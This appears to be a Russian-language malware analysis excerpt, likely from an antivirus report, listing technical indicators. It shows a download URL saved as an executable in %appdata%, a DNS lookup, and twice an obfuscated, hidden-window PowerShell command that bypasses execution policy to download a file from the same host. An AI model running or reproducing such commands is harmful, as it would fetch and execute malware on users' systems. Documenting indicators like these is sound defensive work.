Техническая информация
- http://www.doomgamesoa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowErSHELL.ExE -ExE^CUTiONpOlICy^ bYPAss^ -^n^OPR^OfilE^ -^wINDo^wST^Y^lE^ ^Hi^DdeN^ (N^e^w-^oBjeCt ^SYs^t^Em^.^Net.WEBCL^iEnT^).DO^w^Nlo^ADFil^E(^'http://www.doomgamesoa.t...
- DNS ASK do###amesoa.top
- '<SYSTEM32>\cmd.exe' /C "PowErSHELL.ExE -ExE^CUTiONpOlICy^ bYPAss^ -^n^OPR^OfilE^ -^wINDo^wST^Y^lE^ ^Hi^DdeN^ (N^e^w-^oBjeCt ^SYs^t^Em^.^Net.WEBCL^iEnT^).DO^w^Nlo^ADFil^E(^'http://www.doomgamesoa.t...' (со скрытым окном)